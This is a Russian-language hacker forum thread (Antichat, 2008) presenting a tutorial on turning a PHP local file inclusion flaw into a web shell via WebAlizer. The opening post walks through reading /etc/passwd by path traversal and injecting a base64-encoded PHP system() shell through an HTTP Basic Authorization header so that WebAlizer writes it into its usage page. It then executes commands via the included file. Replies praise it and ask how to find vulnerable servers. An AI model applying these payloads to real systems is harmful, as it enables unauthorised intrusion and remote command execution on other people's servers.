ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

WebAlizer в помошь при Local Include
  #1  
Старый 29.05.2008, 11:16
Аватар для slesh
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию WebAlizer в помошь при Local Include

WebAlizer в помошь при Local Include
Часто бывает что ри нахождении уязвимости типа Local Include нет возможности закачать шелл т.е.

1) Нет форумови скриптов которые сохраняют файлы
2) Не найдены логи апача или иные места возможного залива шела или к ним нет доступа


Прорыв обороны может быть осуществлен через сервис WebAlizer.

Суть сервиса - ежедневно создавать статистику работы веб сервера анализируя его логи.
Ход действий:
1. Берем подопытный сайт с local include
Также необходимо присутствие там сервиса WebAlizer
2. Узнаем путь к папке WebAlizer'a
Для этого просто смотрим файл /etc/passwd
находим там юзверя с именем webalizer и смотрим его домашнюю папку.
3. Смотрим статистику WebAlizer'a
Осуществляем это всё через всё тотже Local Include
типа script.php?file=../../../../../../../../../../домашняя_папка_WebAlizer'a/index.html
От туда берем ссылку на статистику последнего месяца. А именно имя файла. ЧТото типа такого:usage_200804.html
4. Выбираем место для шела
Чаще всего подходящим местом бывает имя пользователя, потому что редко встречается и довольно легко попадает в таблицу статистики.
5. Заливка шела
Браузер не даст нам просто так закинуть шел в имеи пользователя, по этому сделаешь запрос в ручную.
Который потом отошлем через телнет или Ip-Tools. Промежуточный шелл будет у нас таким:
Код:
<? system($cmd); ?>
Для возможности заливки необходимо составить запрос авториации примерно такого вида:
GET / HTTP/1.1
Host: site.com
Authorization: Basic PD8gc3lzdGVtKCRjbWQpOyA/Pjo=

Эта строка представляет собой текст base64('<? system($cmd); ?>: ');
Обратити внимание на то, что в конце обязательно должно стоять двоеточие и пробел. (\\В видео есть ошибка в этом месте\\)
После отправки данного запроса необходимо подождать около суток, чтобы WebAlizer провел анализ логов апача
6. Непосредственно выполнение шела
После анализа логов будет обновлен файл статистики текущего месяца в котором будет уже наш шелл который мы выполним так:site.com/scritp.php?file=../../../../../../../../домашняя_папка_WebAlizer'a/usage_200804.html&cmd=ls

Остальное дело уже простое и банальное.

Скачать демонстрационное видео можно тут: http://oasis.xost.ru/final.rar
 
Ответить с цитированием

  #2  
Старый 29.05.2008, 12:34
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

опиши как найти через гугл сервак с установленным сие чудом а так статейка понравилась поставил плюсеГ
 
Ответить с цитированием

  #3  
Старый 29.05.2008, 12:40
Аватар для slesh
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию

2 satana8920 Это просто один из методов. В последнее время всё чаще и чаще стал встречаться WebAlizer. Это всеголишь один из многочисленных способов заливки шелла.
 
Ответить с цитированием

  #4  
Старый 03.09.2008, 03:43
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

это статья? еще пару строчек в дополнение к первому посту темы http://forum.antichat.ru/thread49775.html
 
Ответить с цитированием

  #5  
Старый 04.09.2008, 12:33
Аватар для slesh
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию

2 c411k Это всеголишь один из вариантов того, что можно использовать при Local Include, но в отличии от других - этот более своеобразен, чем просто обычная запись в логи
 
Ответить с цитированием

  #6  
Старый 08.09.2008, 01:05
Аватар для Nek1t
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Черт! Никак не могу найти топик на ачате, где написаны разнообразные пути к логам апача и другим подобным сервисам?
 
Ответить с цитированием

  #7  
Старый 08.09.2008, 11:51
Аватар для slesh
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию

o_O ну так вот он же http://forum.antichat.ru/thread49775.html
 
Ответить с цитированием

  #8  
Старый 09.09.2008, 02:06
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Молодец хорошее оформление.
Но логи они есть логи есть очень много систем логирования в которых можно записать шелл гараздо сложнее.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перехват Gsm пакетов SNIFF Сотовый фрикинг 16 27.12.2009 22:25
Local include && PHP baz1k Чужие Статьи 0 10.01.2008 04:50
химия своими руками silveran Болталка 43 11.01.2006 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ